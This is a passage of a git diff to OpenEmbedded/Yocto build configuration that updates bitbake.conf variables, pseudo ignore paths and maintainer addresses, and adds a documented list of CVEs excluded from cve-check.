index 2bdc55695b..35faef9a36 100644
--- a/meta/conf/abi_version.conf
+++ b/meta/conf/abi_version.conf
@@ -4,7 +4,7 @@
# that breaks the format and have been previously discussed on the mailing list
# with general agreement from the core team.
#
-OELAYOUT_ABI = "12"
+OELAYOUT_ABI = "14"
#
# HASHEQUIV_HASH_VERSION is injected into the output hash calculation used by
@@ -12,4 +12,4 @@ OELAYOUT_ABI = "12"
# a reset of the equivalence, for example when reproducibility issues break the
# existing match data. Distros can also append to this value for the same effect.
#
-HASHEQUIV_HASH_VERSION = "1"
+HASHEQUIV_HASH_VERSION = "5"
diff --git a/meta/conf/bitbake.conf b/meta/conf/bitbake.conf
index bdade79abe..457b7790c2 100644
--- a/meta/conf/bitbake.conf
+++ b/meta/conf/bitbake.conf
@@ -208,6 +208,7 @@ PF = "${PN}-${EXTENDPE}${PV}-${PR}"
EXTENDPE = "${@['','${PE}_'][int(d.getVar('PE') or 0) > 0]}"
P = "${PN}-${PV}"
+PRSERV_PV_AUTOINC = "AUTOINC"
PRAUTO = ""
EXTENDPRAUTO = "${@['.${PRAUTO}', ''][not d.getVar('PRAUTO')]}"
PRAUTOINX = "${PF}"
@@ -420,8 +421,10 @@ PKGDATA_DIR = "${TMPDIR}/pkgdata/${MACHINE}"
SDK_NAME_PREFIX ?= "oecore"
SDK_NAME = "${SDK_NAME_PREFIX}-${SDK_ARCH}-${TUNE_PKGARCH}"
-SDKPATH = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}"
+SDKPATH = "/usr/local/oe-sdk-hardcoded-buildpath"
SDKPATHNATIVE = "${SDKPATH}/sysroots/${SDK_SYS}"
+# The path to default to installing the SDK to
+SDKPATHINSTALL = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}"
##################################################################
# Kernel info.
@@ -479,7 +482,7 @@ export PATH
# Build utility info.
##################################################################
-# Directory where host tools are copied
+# Directory with symlinks to host tools used by build
HOSTTOOLS_DIR = "${TMPDIR}/hosttools"
# Tools needed to run builds with OE-Core
@@ -499,7 +502,7 @@ HOSTTOOLS += " \
HOSTTOOLS += "${@'ip ping ps scp ssh stty' if (bb.utils.contains_any('IMAGE_CLASSES', 'testimage testsdk', True, False, d) or any(x in (d.getVar("BBINCLUDED") or "") for x in ["testimage.bbclass", "testsdk.bbclass"])) else ''}"
# Link to these if present
-HOSTTOOLS_NONFATAL += "aws gcc-ar gpg ld.bfd ld.gold nc pigz sftp socat ssh sudo"
+HOSTTOOLS_NONFATAL += "aws gcc-ar gpg gpg-agent ld.bfd ld.gold nc pigz sftp socat ssh sudo"
# Temporary add few more detected in bitbake world
HOSTTOOLS_NONFATAL += "join nl size yes zcat"
@@ -638,7 +641,7 @@ APACHE_MIRROR = "https://archive.apache.org/dist"
DEBIAN_MIRROR = "http://ftp.debian.org/debian/pool"
GENTOO_MIRROR = "http://distfiles.gentoo.org/distfiles"
GNOME_GIT = "git://gitlab.gnome.org/GNOME"
-GNOME_MIRROR = "https://ftp.gnome.org/pub/GNOME/sources"
+GNOME_MIRROR = "https://download.gnome.org/sources/"
GNU_MIRROR = "https://ftp.gnu.org/gnu"
GNUPG_MIRROR = "https://www.gnupg.org/ftp/gcrypt"
GPE_MIRROR = "http://gpe.linuxtogo.org/download/source"
@@ -686,13 +689,18 @@ SRC_URI = ""
PSEUDO_LOCALSTATEDIR ?= "${WORKDIR}/pseudo/"
PSEUDO_PASSWD ?= "${STAGING_DIR_TARGET}:${PSEUDO_SYSROOT}"
PSEUDO_SYSROOT = "${COMPONENTS_DIR}/${BUILD_ARCH}/pseudo-native"
+PSEUDO_IGNORE_PATHS = "/usr/,/etc/,/lib,/dev/,/run/,${T},${WORKDIR}/recipe-sysroot,${SSTATE_DIR},${STAMPS_DIR}"
+PSEUDO_IGNORE_PATHS .= ",${TMPDIR}/sstate-control,${TMPDIR}/buildstats,${TMPDIR}/sysroots-components,${TMPDIR}/pkgdata"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/deploy-,${WORKDIR}/sstate-build-package_,${WORKDIR}/sstate-install-package_,${WORKDIR}/pkgdata-sysroot"
+PSEUDO_IGNORE_PATHS .= ",${DEPLOY_DIR},${BUILDHISTORY_DIR},${TOPDIR}/cache,${COREBASE}/scripts,${CCACHE_DIR}"
+
export PSEUDO_DISABLED = "1"
#export PSEUDO_PREFIX = "${STAGING_DIR_NATIVE}${prefix_native}"
#export PSEUDO_BINDIR = "${STAGING_DIR_NATIVE}${bindir_native}"
#export PSEUDO_LIBDIR = "${STAGING_DIR_NATIVE}$PSEUDOBINDIR/../lib/pseudo/lib
-FAKEROOTBASEENV = "PSEUDO_BINDIR=${PSEUDO_SYSROOT}${bindir_native} PSEUDO_LIBDIR=${PSEUDO_SYSROOT}${prefix_native}/lib/pseudo/lib PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_DISABLED=1"
+FAKEROOTBASEENV = "PSEUDO_BINDIR=${PSEUDO_SYSROOT}${bindir_native} PSEUDO_LIBDIR=${PSEUDO_SYSROOT}${prefix_native}/lib/pseudo/lib PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_IGNORE_PATHS=${@oe.path.canonicalize(d.getVar('PSEUDO_IGNORE_PATHS'))} PSEUDO_DISABLED=1 PYTHONDONTWRITEBYTECODE=1"
FAKEROOTCMD = "${PSEUDO_SYSROOT}${bindir_native}/pseudo"
-FAKEROOTENV = "PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_LOCALSTATEDIR=${PSEUDO_LOCALSTATEDIR} PSEUDO_PASSWD=${PSEUDO_PASSWD} PSEUDO_NOSYMLINKEXP=1 PSEUDO_DISABLED=0"
+FAKEROOTENV = "PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_LOCALSTATEDIR=${PSEUDO_LOCALSTATEDIR} PSEUDO_PASSWD=${PSEUDO_PASSWD} PSEUDO_NOSYMLINKEXP=1 PSEUDO_IGNORE_PATHS=${@oe.path.canonicalize(d.getVar('PSEUDO_IGNORE_PATHS'))} PSEUDO_DISABLED=0"
FAKEROOTNOENV = "PSEUDO_UNLOAD=1"
FAKEROOTDIRS = "${PSEUDO_LOCALSTATEDIR}"
PREFERRED_PROVIDER_virtual/fakeroot-native ?= "pseudo-native"
@@ -874,8 +882,8 @@ BB_CONSOLELOG ?= "${LOG_DIR}/cooker/${MACHINE}/${DATETIME}.log"
# Setup our default hash policy
BB_SIGNATURE_HANDLER ?= "OEBasicHash"
-BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH BBSERVER DL_DIR \
- SSTATE_DIR THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \
+BB_HASHEXCLUDE_COMMON ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH BBSERVER DL_DIR \
+ THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \
USER FILESPATH STAGING_DIR_HOST STAGING_DIR_TARGET COREBASE PRSERV_HOST \
STAMPS_DIR PRSERV_DUMPDIR PRSERV_DUMPFILE PRSERV_LOCKDOWN PARALLEL_MAKE \
CCACHE_DIR EXTERNAL_TOOLCHAIN CCACHE CCACHE_NOHASHDIR LICENSE_PATH SDKPKGSUFFIX \
@@ -883,12 +891,13 @@ BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH BBSERVER DL_DI
BB_WORKERCONTEXT BB_LIMITEDDEPS BB_UNIHASH extend_recipe_sysroot DEPLOY_DIR \
SSTATE_HASHEQUIV_METHOD SSTATE_HASHEQUIV_REPORT_TASKDATA \
SSTATE_HASHEQUIV_OWNER CCACHE_TOP_DIR BB_HASHSERVE GIT_CEILING_DIRECTORIES"
-BB_HASHCONFIG_WHITELIST ?= "${BB_HASHBASE_WHITELIST} DATE TIME SSH_AGENT_PID \
+BB_HASHBASE_WHITELIST ?= "${BB_HASHEXCLUDE_COMMON} PSEUDO_IGNORE_PATHS BUILDHISTORY_DIR SSTATE_DIR "
+BB_HASHCONFIG_WHITELIST ?= "${BB_HASHEXCLUDE_COMMON} DATE TIME SSH_AGENT_PID \
SSH_AUTH_SOCK PSEUDO_BUILD BB_ENV_EXTRAWHITE DISABLE_SANITY_CHECKS \
PARALLEL_MAKE BB_NUMBER_THREADS BB_ORIGENV BB_INVALIDCONF BBINCLUDED \
GIT_PROXY_COMMAND ALL_PROXY all_proxy NO_PROXY no_proxy FTP_PROXY ftp_proxy \
HTTP_PROXY http_proxy HTTPS_PROXY https_proxy SOCKS5_USER SOCKS5_PASSWD \
- BB_SETSCENE_ENFORCE BB_CMDLINE BB_SERVER_TIMEOUT"
+ BB_SETSCENE_ENFORCE BB_CMDLINE BB_SERVER_TIMEOUT BB_NICE_LEVEL"
BB_SIGNATURE_EXCLUDE_FLAGS ?= "doc deps depends \
lockfiles type vardepsexclude vardeps vardepvalue vardepvalueexclude \
file-checksums python func task export unexport noexec nostamp dirs cleandirs \
diff --git a/meta/conf/distro/include/cve-extra-exclusions.inc b/meta/conf/distro/include/cve-extra-exclusions.inc
new file mode 100644
index 0000000000..f3490db9dd
--- /dev/null
+++ b/meta/conf/distro/include/cve-extra-exclusions.inc
@@ -0,0 +1,75 @@
+# This file contains a list of CVEs where resolution has proven to be impractical
+# or there is no reasonable action the Yocto Project can take to resolve the issue.
+# It contains all the information we are aware of about an issue and analysis about
+# why we believe it can't be fixed/handled. Additional information is welcome through
+# patches to the file.
+#
+# Include this file in your local.conf or distro.conf to exclude these CVEs
+# from the cve-check results or add to the bitbake command with:
+# -R conf/distro/include/cve-extra-exclusions.inc
+#
+# The file is not included by default since users should review this data to ensure
+# it matches their expectations and usage of the project.
+#
+# We may also include "in-flight" information about current/ongoing CVE work with
+# the aim of sharing that work and ensuring we don't duplicate it.
+#
+
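+# As an illustration only (the image name below is just an example target, not
+# a requirement), the file can be pulled in from local.conf with:
+#   include conf/distro/include/cve-extra-exclusions.inc
+# or for a single invocation on the command line:
+#   bitbake -R conf/distro/include/cve-extra-exclusions.inc core-image-minimal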
+
+# strace https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0006
+# CVE is more than 20 years old with no resolution evident
+# broken links in CVE database references make resolution impractical
+CVE_CHECK_WHITELIST += "CVE-2000-0006"
+
+# epiphany https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0238
+# The issue here is spoofing of domain names using characters from other character sets.
+# There has been much discussion amongst the epiphany and webkit developers and
+# whilst there are improvements in how domains are handled and displayed to the user,
+# there is unlikely ever to be a single fix to webkit or epiphany which addresses this
+# problem. Whitelisted as there is no mitigation, fix, or way to progress this
+# further that we can see.
+CVE_CHECK_WHITELIST += "CVE-2005-0238"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4756
+# Issue is memory exhaustion via glob() calls, e.g. from within an ftp server
+# Best discussion in https://bugzilla.redhat.com/show_bug.cgi?id=681681
+# Upstream doesn't see it as a security issue; ftp servers shouldn't be passing
+# this to libc glob. Exclude as upstream have no plans to add BSD's GLOB_LIMIT or similar
+CVE_CHECK_WHITELIST += "CVE-2010-4756"
+
+# go https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29509
+# go https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29511
+# The encoding/xml package in go can potentially be used for security exploits if not used correctly
+# CVE applies to a netapp product as well as flagging a general issue. We don't ship anything
+# exposing this interface in an exploitable way
+CVE_CHECK_WHITELIST += "CVE-2020-29509 CVE-2020-29511"
+
+# db
+# Since Oracle relicensed bdb, the open source community is slowly but surely replacing bdb with
+# supported and open source friendly alternatives. As a result these CVEs are unlikely to ever be fixed.
+CVE_CHECK_WHITELIST += "CVE-2015-2583 CVE-2015-2624 CVE-2015-2626 CVE-2015-2640 CVE-2015-2654 \
+CVE-2015-2656 CVE-2015-4754 CVE-2015-4764 CVE-2015-4774 CVE-2015-4775 CVE-2015-4776 CVE-2015-4777 \
+CVE-2015-4778 CVE-2015-4779 CVE-2015-4780 CVE-2015-4781 CVE-2015-4782 CVE-2015-4783 CVE-2015-4784 \
+CVE-2015-4785 CVE-2015-4786 CVE-2015-4787 CVE-2015-4788 CVE-2015-4789 CVE-2015-4790 CVE-2016-0682 \
+CVE-2016-0689 CVE-2016-0692 CVE-2016-0694 CVE-2016-3418 CVE-2020-2981"
+
+# qemu:qemu-native:qemu-system-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20255
+# There was a proposed patch https://lists.gnu.org/archive/html/qemu-devel/2021-02/msg06098.html
+# qemu maintainers say the patch is incorrect and should not be applied
+# Ignore from OE's perspective as the issue is of low impact, at worst sitting in an infinite loop rather than being exploitable
+CVE_CHECK_WHITELIST += "CVE-2021-20255"
+
+# qemu:qemu-native:qemu-system-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12067
+# There was a proposed patch but it was rejected by upstream qemu. It is unclear if the issue can
+# still be reproduced or where exactly any bug is.
+# Ignore from OE's perspective as we'll pick up any fix when upstream accepts one.
+CVE_CHECK_WHITELIST += "CVE-2019-12067"
+
+# nasm:nasm-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-18974
+# It is a fuzzing-related buffer overflow. It is of low impact since most devices
+# wouldn't expose an assembler. Upstream is inactive and there is little to be
+# done about the bug; ignore it from an OE perspective.
+CVE_CHECK_WHITELIST += "CVE-2020-18974"
+
+
+
diff --git a/meta/conf/distro/include/default-distrovars.inc b/meta/conf/distro/include/default-distrovars.inc
index 433d4b6651..038acc1504 100644
--- a/meta/conf/distro/include/default-distrovars.inc
+++ b/meta/conf/distro/include/default-distrovars.inc
@@ -47,5 +47,5 @@ KERNEL_IMAGETYPES ??= "${KERNEL_IMAGETYPE}"
# The CONNECTIVITY_CHECK_URIS are used to test whether we can successfully
# fetch from the network (and warn you if not). To disable the test set
# the variable to be empty.
-# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master
-CONNECTIVITY_CHECK_URIS ?= "https://www.example.com/"
+# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master;branch=master
+CONNECTIVITY_CHECK_URIS ?= "https://yoctoproject.org/connectivity.html"
diff --git a/meta/conf/distro/include/maintainers.inc b/meta/conf/distro/include/maintainers.inc
index ff962a3be9..11a35a2c59 100644
--- a/meta/conf/distro/include/maintainers.inc
+++ b/meta/conf/distro/include/maintainers.inc
@@ -4,7 +4,7 @@
#
# Please submit any patches against recipes in meta to the
# OE-Core mail list (openembedded-core@lists.openembedded.org)
-# For recipes in meta-yocto please use the Poky list (poky@yoctoproject.org)
+# For recipes in meta-yocto please use the Poky list (poky@lists.yoctoproject.org)
#
# If you have problems with or questions about a particular recipe, feel
# free to contact the maintainer directly (cc:ing the appropriate mailing list
@@ -88,8 +88,8 @@ RECIPE_MAINTAINER_pn-builder = "Richard Purdie <richard.purdie@linuxfoundation.o
RECIPE_MAINTAINER_pn-buildtools-extended-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-buildtools-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-busybox = "Andrej Valek <andrej.valek@siemens.com>"
-RECIPE_MAINTAINER_pn-busybox-inittab = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-bzip2 = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-busybox-inittab = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-bzip2 = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-ca-certificates = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-cairo = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-cantarell-fonts = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -125,7 +125,7 @@ RECIPE_MAINTAINER_pn-core-image-sato-dev = "Richard Purdie <richard.purdie@linux
RECIPE_MAINTAINER_pn-core-image-sato-ptest-fast = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-core-image-sato-sdk-ptest = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-coreutils = "Chen Qi <Qi.Chen@windriver.com>"
-RECIPE_MAINTAINER_pn-cpio = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-cpio = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-cracklib = "Armin Kuster <akuster808@gmail.com>"
RECIPE_MAINTAINER_pn-createrepo-c = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-cronie = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -194,7 +194,7 @@ RECIPE_MAINTAINER_pn-gcc-cross-canadian-${TRANSLATED_TARGET_ARCH} = "Khem Raj <r
RECIPE_MAINTAINER_pn-gcc-crosssdk-${SDK_SYS} = "Khem Raj <raj.khem@gmail.com>"
RECIPE_MAINTAINER_pn-gcc-runtime = "Khem Raj <raj.khem@gmail.com>"
RECIPE_MAINTAINER_pn-gcc-sanitizers = "Khem Raj <raj.khem@gmail.com>"
-RECIPE_MAINTAINER_pn-gcc-source-9.3.0 = "Khem Raj <raj.khem@gmail.com>"
+RECIPE_MAINTAINER_pn-gcc-source-9.5.0 = "Khem Raj <raj.khem@gmail.com>"
RECIPE_MAINTAINER_pn-gconf = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-gcr = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-gdb = "Khem Raj <raj.khem@gmail.com>"
@@ -233,7 +233,7 @@ RECIPE_MAINTAINER_pn-gobject-introspection = "Alexander Kanavin <alex.kanavin@gm
RECIPE_MAINTAINER_pn-gperf = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-gpgme = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-gptfdisk = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-grep = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-grep = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-groff = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-grub = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-grub-bootconf = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -254,9 +254,9 @@ RECIPE_MAINTAINER_pn-gstreamer1.0-rtsp-server = "Anuj Mittal <anuj.mittal@intel.
RECIPE_MAINTAINER_pn-gstreamer1.0-vaapi = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-gtk+3 = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-gtk-doc = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-gzip = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-gzip = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-harfbuzz = "Anuj Mittal <anuj.mittal@intel.com>"
-RECIPE_MAINTAINER_pn-hdparm = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-hdparm = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-help2man-native = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-hicolor-icon-theme = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-hwlatdetect = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -454,10 +454,10 @@ RECIPE_MAINTAINER_pn-ltp = "Yi Zhao <yi.zhao@windriver.com>"
RECIPE_MAINTAINER_pn-lttng-modules = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-lttng-tools = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-lttng-ust = "Richard Purdie <richard.purdie@linuxfoundation.org>"
-RECIPE_MAINTAINER_pn-lz4 = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-lzo = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-lzip = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-lzop = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-lz4 = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-lzo = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-lzip = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-lzop = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-m4 = "Robert Yang <liezhi.yang@windriver.com>"
RECIPE_MAINTAINER_pn-m4-native = "Robert Yang <liezhi.yang@windriver.com>"
RECIPE_MAINTAINER_pn-make = "Robert Yang <liezhi.yang@windriver.com>"
@@ -501,7 +501,7 @@ RECIPE_MAINTAINER_pn-mpeg2dec = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-mpfr = "Khem Raj <raj.khem@gmail.com>"
RECIPE_MAINTAINER_pn-mpg123 = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-msmtp = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-mtd-utils = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-mtd-utils = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-mtdev = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-mtools = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-musl = "Khem Raj <raj.khem@gmail.com>"
@@ -545,7 +545,7 @@ RECIPE_MAINTAINER_pn-pango = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-parted = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-patch = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-patchelf = "Richard Purdie <richard.purdie@linuxfoundation.org>"
-RECIPE_MAINTAINER_pn-pbzip2 = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-pbzip2 = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-pciutils = "Chen Qi <Qi.Chen@windriver.com>"
RECIPE_MAINTAINER_pn-pcmanfm = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-perf = "Bruce Ashfield <bruce.ashfield@gmail.com>"
@@ -576,6 +576,7 @@ RECIPE_MAINTAINER_pn-python3 = "Oleksandr Kravchuk <open.source@oleksandr-kravch
RECIPE_MAINTAINER_pn-python3-async = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
RECIPE_MAINTAINER_pn-python3-dbus = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
RECIPE_MAINTAINER_pn-python3-docutils = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
+RECIPE_MAINTAINER_pn-python3-dtschema-wrapper = "Bruce Ashfield <bruce.ashfield@gmail.com>"
RECIPE_MAINTAINER_pn-python3-pycryptodome = "Joshua Watt <JPEWhacker@gmail.com>"
RECIPE_MAINTAINER_pn-python3-pycryptodomex = "Joshua Watt <JPEWhacker@gmail.com>"
RECIPE_MAINTAINER_pn-python3-extras = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
@@ -661,9 +662,9 @@ RECIPE_MAINTAINER_pn-systemd-conf = "Chen Qi <Qi.Chen@windriver.com>"
RECIPE_MAINTAINER_pn-systemd-compat-units = "Chen Qi <Qi.Chen@windriver.com>"
RECIPE_MAINTAINER_pn-systemd-serialgetty = "Chen Qi <Qi.Chen@windriver.com>"
RECIPE_MAINTAINER_pn-systemd-systemctl-native = "Chen Qi <Qi.Chen@windriver.com>"
-RECIPE_MAINTAINER_pn-systemtap = "Victor Kamensky <kamensky@cisco.com>"
-RECIPE_MAINTAINER_pn-systemtap-native = "Victor Kamensky <kamensky@cisco.com>"
-RECIPE_MAINTAINER_pn-systemtap-uprobes = "Victor Kamensky <kamensky@cisco.com>"
+RECIPE_MAINTAINER_pn-systemtap = "Victor Kamensky <victor.kamensky7@gmail.com>"
+RECIPE_MAINTAINER_pn-systemtap-native = "Victor Kamensky <victor.kamensky7@gmail.com>"
+RECIPE_MAINTAINER_pn-systemtap-uprobes = "Victor Kamensky <victor.kamensky7@gmail.com>"
RECIPE_MAINTAINER_pn-sysvinit = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-sysvinit-inittab = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-taglib = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -685,7 +686,7 @@ RECIPE_MAINTAINER_pn-udev-extraconf = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-unfs3 = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-unifdef = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-uninative-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
-RECIPE_MAINTAINER_pn-unzip = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-unzip = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-update-rc.d = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-usbinit = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-usbutils = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -706,11 +707,11 @@ RECIPE_MAINTAINER_pn-vulkan-tools = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-waffle = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-watchdog = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-watchdog-config = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-wayland = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-wayland-protocols = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-wayland = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-wayland-protocols = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-webkitgtk = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-weston = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-weston-init = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-weston = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-weston-init = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-wget = "Yi Zhao <yi.zhao@windriver.com>"
RECIPE_MAINTAINER_pn-which = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-wic-tools = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -764,6 +765,6 @@ RECIPE_MAINTAINER_pn-xtrans = "Armin Kuster <akuster808@gmail.com>"
RECIPE_MAINTAINER_pn-xuser-account = "Armin Kuster <akuster808@gmail.com>"
RECIPE_MAINTAINER_pn-xvinfo = "Armin Kuster <akuster808@gmail.com>"
RECIPE_MAINTAINER_pn-xwininfo = "Armin Kuster <akuster808@gmail.com>"
-RECIPE_MAINTAINER_pn-xz = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-zip = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-zlib = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-xz = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-zip = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-zlib = "Denys Dmytriyenko <denys@denix.org>"
diff --git a/meta/conf/distro/include/ptest-packagelists.inc b/meta/conf/distro/include/ptest-packagelists.inc
index c13ff724b1..3fb7ec2657 100644
--- a/meta/conf/distro/include/ptest-packagelists.inc
+++ b/meta/conf/distro/include/ptest-packagelists.inc
@@ -26,6 +26,7 @@ PTESTS_FAST = "\
liberror-perl-ptest \
libmodule-build-perl-ptest \
libpcre-ptest \
+ libpng-ptest \
libtimedate-perl-ptest \
libtest-needs-perl-ptest \
liburi-perl-ptest \
@@ -60,6 +61,7 @@ PTESTS_FAST = "\
# bash-ptest \ # Test outcomes are non-deterministic by design
# ifupdown-ptest \ # Tested separately in lib/oeqa/selftest/cases/imagefeatures.py
# mdadm-ptest \ # Tests rely on non-deterministic sleep() amounts
+# libinput-ptest \ # Tests need an unloaded system to be reliable
#"
PTESTS_SLOW = "\
diff --git a/meta/conf/distro/include/yocto-uninative.inc b/meta/conf/distro/include/yocto-uninative.inc
index 69b6edee5f..4ac66fd506 100644
--- a/meta/conf/distro/include/yocto-uninative.inc
+++ b/meta/conf/distro/include/yocto-uninative.inc
@@ -6,9 +6,10 @@
